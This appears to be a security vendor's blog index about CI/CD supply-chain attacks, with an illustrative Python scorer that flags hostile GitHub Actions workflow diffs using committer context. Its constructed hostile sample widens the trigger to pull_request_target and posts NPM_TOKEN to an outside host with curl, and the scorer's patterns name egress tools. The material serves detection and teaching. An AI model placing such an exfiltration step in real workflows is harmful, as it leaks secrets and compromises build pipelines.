Data and dispatches on CI/CD supply-chain attacks — how big the problem is, who's driving it, and why the gap between identity and the pipeline keeps winning.
Malicious packages up 75% year over year, a 267-day median time to detection, ~29M secrets leaked — and the nation-states (North Korea, China, Russia, Iran) behind the worst of it. Sourced.
The security market is organized by telemetry domain, not by how attacks move. Why no incumbent owns the seam between identity and the pipeline — and why that gap is structural, not an oversight.
The $0 hygiene that stops most CI/CD supply-chain attacks — and the residual risk (a valid credential turning hostile) that's actually worth paying to detect.
A syntactically valid GitHub Actions workflow can still be an attack. Why pattern-matching misses intent — and what reasoning over the diff plus the committer looks like.
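To make the distinction concrete, here is an added illustration (not code from the original post or from Sentinel): a small scorer that looks at what a workflow change does and who committed it, next to the keyword rule it replaces. Both workflows, the hostnames, the committer identities and the thresholds are constructed for the example.

```python
"""
Constructed example: reason over a GitHub Actions workflow diff plus committer
context instead of grepping for keywords. Workflows, hosts, committers and
thresholds below are made up for illustration (not the original page's code).
"""
import re
from dataclasses import dataclass

# Baseline: push-triggered, action pinned to a commit SHA, no secrets in run steps.
BEFORE = """\
name: ci
on:
  push:
    branches: [main]
permissions:
  contents: read
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@1d96c772d19495a3b5c517cd2bc0cb401ea0529f
      - run: npm ci && npm test
"""

# Hostile change, still valid YAML: widens the trigger so fork PRs run with
# repository secrets, checks out the untrusted PR head, weakens the action pin
# to a mutable tag, and posts a secret to an outside host (constructed name).
AFTER_HOSTILE = """\
name: ci
on:
  push:
    branches: [main]
  pull_request_target:
permissions:
  contents: read
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - run: npm ci && npm test
      - run: curl -s -d "${{ secrets.NPM_TOKEN }}" https://telemetry.example.net/ingest
"""

# Benign change that a keyword rule ("secrets." near "curl") also flags:
# the maintainer posts a commit status back to the GitHub API.
AFTER_BENIGN = """\
name: ci
on:
  push:
    branches: [main]
permissions:
  contents: read
  statuses: write
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@1d96c772d19495a3b5c517cd2bc0cb401ea0529f
      - run: npm ci && npm test
      - run: |
          TOKEN="${{ secrets.GITHUB_TOKEN }}"
          curl -s -H "Authorization: token $TOKEN" "https://api.github.com/repos/acme/app/statuses/$GITHUB_SHA"
"""

SECRET_REF = re.compile(r"\$\{\{\s*secrets\.\w+\s*\}\}")
EGRESS_CMD = re.compile(r"\b(curl|wget|nc|ncat|Invoke-WebRequest)\b")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")
TRUSTED_HOSTS = {"github.com", "api.github.com", "objects.githubusercontent.com"}  # assumption: org allowlist


@dataclass
class Committer:
    """Identity context a pipeline can look up for the commit author (constructed fields)."""
    login: str
    signed: bool                # commit carries a verified signature
    prior_commits: int          # commits by this identity in the repository
    prior_workflow_edits: int   # earlier touches to .github/workflows/
    account_age_days: int


MAINTAINER = Committer("maintainer-a", True, 1400, 37, 2900)
NEWCOMER = Committer("fresh-contrib", False, 0, 0, 11)


def added_lines(before: str, after: str) -> list[str]:
    """Lines present in the new workflow but not the old one (a minimal diff)."""
    old = set(before.splitlines())
    return [line for line in after.splitlines() if line not in old]


def keyword_rule(added: list[str]) -> bool:
    """The naive check: a secret reference and a download tool anywhere in the hunk."""
    text = "\n".join(added)
    return bool(SECRET_REF.search(text) and EGRESS_CMD.search(text))


def diff_findings(added: list[str]) -> list[str]:
    """Semantic claims about what the change does, regardless of how it is spelled."""
    text = "\n".join(added)
    out = []
    widened = re.search(r"^\s*pull_request_target\s*:", text, re.M) is not None
    head_ref = re.search(r"github\.event\.pull_request\.head\.(sha|ref)", text) is not None
    if widened and head_ref:
        out.append("untrusted PR code runs with repository secrets")
    elif widened:
        out.append("trigger widened to pull_request_target")
    # A secret only matters as exfiltration if it can leave for a host we do not control.
    hosts = set(URL_HOST.findall(text)) - TRUSTED_HOSTS
    if SECRET_REF.search(text) and EGRESS_CMD.search(text) and hosts:
        out.append("secret value sent to outside host: " + ",".join(sorted(hosts)))
    for m in re.finditer(r"uses:\s*\S+@(\S+)", text):
        if not re.fullmatch(r"[0-9a-f]{40}", m.group(1)):
            out.append("action pin weakened to mutable ref " + m.group(1))
    return out


def assess(before: str, after: str, who: Committer) -> dict:
    """Combine diff semantics with committer context into a verdict."""
    findings = diff_findings(added_lines(before, after))
    context = []
    if who.prior_workflow_edits == 0:
        context.append("first workflow edit by this identity")
    if not who.signed:
        context.append("unsigned commit")
    if who.account_age_days < 30:
        context.append("account younger than 30 days")
    if findings and context:
        verdict = "block"
    elif findings:
        verdict = "review"   # trusted identity, hostile-looking change: a credential turned hostile
    elif context:
        verdict = "watch"    # identity-only signals are weak on their own
    else:
        verdict = "allow"
    return {"verdict": verdict, "findings": findings, "context": context}


if __name__ == "__main__":
    for label, after, who in (("benign/maintainer", AFTER_BENIGN, MAINTAINER),
                              ("hostile/newcomer", AFTER_HOSTILE, NEWCOMER),
                              ("hostile/maintainer", AFTER_HOSTILE, MAINTAINER)):
        print(label, "keyword:", keyword_rule(added_lines(BEFORE, after)), assess(BEFORE, after, who))
```

The keyword rule fires on both changes because both put `secrets.` and `curl` in one hunk; the semantic pass clears the benign one (the only destination is an allowlisted GitHub host) and raises three distinct findings on the hostile one. Identity then decides what to do with those findings: a newcomer's unsigned first workflow edit is blocked outright, while the same diff from a long-standing maintainer still lands in review, which is the case prevention and identity checks cannot help with.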
320+ companies in a year. When the "insider threat" holds a real badge and a real commit history, prevention can't help and identity checks pass — so what's left to detect?
The incident that started Sentinel — an org-admin takeover that ran for days — and where the trail led. What state-aligned tradecraft looks like from the receiving end, and why the geopolitical backdrop makes the developer supply chain a front line.